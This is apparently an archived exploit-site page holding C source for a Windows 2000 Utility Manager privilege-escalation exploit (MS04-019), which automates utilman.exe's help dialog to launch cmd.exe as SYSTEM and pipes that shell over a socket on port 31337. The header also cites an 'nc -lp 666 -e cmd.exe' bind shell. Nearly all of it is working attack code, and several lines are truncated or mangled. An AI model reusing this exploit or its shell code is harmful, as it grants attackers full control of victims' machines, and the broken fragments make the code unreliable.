Windows 2000 Utility Manager all in one Exploit (MS04-019)


                        
/******************************************************************************************
 *****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
 **                                 [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt]                               **
*******************************************************************************************
 **   It gets system language and sets windows names to work on any win2k :P                                            **
 **   Feel free to add other languages :)                                                                                                   **
 **   v2.666: added autonomous (allinone) remote exploitation system ;)                                                    **
 **   It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a                                **
 **   normal user account). Must be called with an argument (any argument)                                                 **
 **   You know where we are..                                                                                                                  **
 *****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
 ******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo  sqlsec>at< elevation of priviliges exploit for windows utility manager one you a shell with system privileges have problems try changing sleep values. end original disclaimer>
#include 
#include 
#include 
#include 

#pragma comment (lib,"ws2_32")

#define EXIT_SHELL "exit -shell"
#define HOST "localhost"
#define PORT 31337

struct {
 int id;
 char *utilman;
 char *winhelp;
 char *open;
} lang[] = {
        { 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, /* French  */
        { 0x09,"Utility manager","Windows Help","Open" }            /* English */
};

void print_lang(int id)
{
        char *lang_list[] = {"Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech",
                             "Danish","German","Greek","English","Spanish","Finnish",
                             "French","Hebrew","Hungarian","Icelandic","italian",
                             "Japanese","Korean","Dutch","Norwegian","Polish",
                             "Portuguese","Romanian","Russian","Croatian","Serbian",
                             "Slovak","Albanian","Swedish","Thai","Turkish","Urdu",
                             "Indonesian","Ukrainian","Belarusian","Slovenian",
                             "Estonian","Latvian","Lithuanian","Farsi","Vietnamese",
                             "Armenian","Azeri","Basque","FYRO Macedonian","Afrikaans",
                             "Georgian","Faeroese","Hindi","Malay","Kazak","Kyrgyz",
                             "Swahili","Uzbek","Tatar","Not supported","Punjabi",
                             "Gujarati","Not supported","Tamil","Telugu","Kannada",
                             "Not supported","Not supported","Marathi","Sanskrit",
                             "Mongolian","Galician the best ;)","Konkani","Not supported",
                             "Not supported","Syriac","Not supported","Not supported",
                             "Divehi","Invariant"};
        printf("%s\r\n",lang_list[id]);
        return;
}

int cnx(char *host, int port)
{
        SOCKET sock;
        struct sockaddr_in yeah;
        struct hostent *she;
        PROCESS_INFORMATION ProcessInformation;
        STARTUPINFO si;

        printf("[i] should be called by myself, try with any argument to load the attack\r\n");
        fflush(stdout);
        sock = WSASocket(0x02,0x01,0x00,0x00,0x00,0x00);
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return -1;
                }

        yeah.sin_family=AF_INET; 
        yeah.sin_addr.s_addr=inet_addr(host); 
        yeah.sin_port=htons((u_short)port);

if((she=gethostbyname(host))!=NULL) { 
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length); 
        } else { 
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return -1;
                } 
        }
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return -1;
                }

        si.cb = 0x44;
        si.lpReserved = 0x00;
        si.lpTitle = 0x00;
        si.lpDesktop = 0x00;
        si.dwX = 0x00;
        si.dwY = 0x00;
        si.dwXSize = 0x00;
        si.dwYSize = 0x00;
        si.wShowWindow = 0x00;
        si.lpReserved2 = 0x00;
        si.cbReserved2 = 0x00;

        si.dwFlags = 0x101;

        si.hStdInput  = (void *)sock;
        si.hStdOutput = (void *)sock;
        si.hStdError = (void *)sock;

        if(!CreateProcess(0x00, "cmd", 0x00, 0x00, 0x01, 0x10, 0x00, 0x00,&si, &ProcessInformation)) {
                printf("CreateProcess() error\r\n");
                return -1;
        }
        return 0;
}

void cmdshell(int sock)
{
        int length=666;
        char buffer[1024];

while(length) {
                length=read(0,buffer,sizeof(buffer));
                buffer[length]=0;
                if(!strncmp(buffer,EXIT_SHELL,strlen(EXIT_SHELL))) {
                        send(sock,"exit\r\n",6,0);
                        break;
                        }
                length=send(sock,buffer,length,0);
                if (length0) {
                buffer[sin_size]=0x00;
                printf("%s",buffer);
                fflush(stdout);
                }
        printf("\r\n[i] shell lost\r\n");
        return;
}

int set_lang(void)
{
        unsigned int lang_usr,lang_sys,id;

        id=GetSystemDefaultLangID();
        lang_sys=PRIMARYLANGID(id);
        id=GetUserDefaultLangID();
        lang_usr=PRIMARYLANGID(id);
        if(lang_usr!=lang_sys) {
                printf("warning: user language differs from system language\r\n\r\n");
                printf("1. system : ");print_lang(lang_sys);
                printf("2. user   : ");print_lang(lang_usr);printf("Select(1-2): ");
                fflush(stdout);
                id=getch();
        if(id!=49&&id!=50) {
                printf("wrong choice '%c', leaving.\r\n",id);
                exit(0);
                }
        if(id==49) {
                printf("system language\r\n");
                return lang_sys;
                }
        else
                printf("user language\r\n");
        }
        return lang_usr;
}

void banner()
{
        printf("\r\n\r\n\t[Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt]\r\n");
        printf("\t\t\t  base code by Cesar Cerrudo\r\n");
        printf("\t     added autonomous (allinone) remote exploitation system\r\n");
        printf("\t\t\t   You know where we are...\r\n\r\n");
        fflush(stdout);
        return;
}

void give_magicshell(void)
{
        cnx(HOST,PORT);
        exit(0);
        return;
}

void enter_filename(HWND hwnd,char *filename,int size)
{
        unsigned int i;

        for(i=0;i0;j--)
                if(argv[0][j]=='\\') {
                        j++;break;
                }
        strncpy(cmd,&argv[0][j],508);
        if(cmd[strlen(cmd)-4]!='.')
                strcat(cmd,".exe");

        printf("prog: %s\r\n",cmd);
        cmd[strlen(cmd)-1]='?';
        fflush(stdout);
//  run utility manager
        WinExec("utilman.exe /start",SW_HIDE);
        Sleep(1000);

        lHandle=FindWindow(NULL, lang[i].utilman);   
    if (!lHandle) {
                printf("error: unable to start utilman.exe.\r\n");
                return 0;
        }

    PostMessage(lHandle,0x313,0,0); //=right click on the app button in the taskbar or Alt+Space Bar
        Sleep(100);

        SendMessage(lHandle,0x365,0,0x1); //send WM_COMMANDHELP  0x0365  lParam must beNULL 
        Sleep(300);
        
        SendMessage (FindWindow(NULL, lang[i].winhelp), WM_IME_KEYDOWN, VK_RETURN, 0);
        Sleep(500);

        // find open file dialog window
        lHandle = FindWindow("#32770",lang[i].open);
    // get input box handle
    lHandle2 = GetDlgItem(lHandle, 0x47C);
    Sleep(500);

        path=(char*)malloc(path_len);
        GetCurrentDirectory(path_len,path);
        printf("path: %s\r\n",path);
    SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)path);
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
        free(path);
        fflush(stdout);

    // set text to filter listview to display only cmd.exe
    SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);
    Sleep(800);

    // send return
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

    //get navigation bar handle
    lHandle2 = GetDlgItem(lHandle, 0x4A0);
    
    //send tab
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    Sleep(500);
    lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
    //get list view handle
    lHandle2 = GetDlgItem(lHandle2, 0x1);

        enter_filename(lHandle2,cmd,strlen(cmd)-4);
    Sleep(500);

    //popup context menu
    PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
    Sleep(1000);

    // get context menu handle
    point.x =10; point.y =30;
    lHandle2=WindowFromPoint(point);

    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

    SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
    Sleep(500);

        SendMessage (FindWindow(NULL, lang[i].winhelp), WM_CLOSE, 0, 0);// close open error window
        SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
        WaitForSingleObject(hdlr,INFINITE);
        WSACleanup();
        return 0;
}

 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits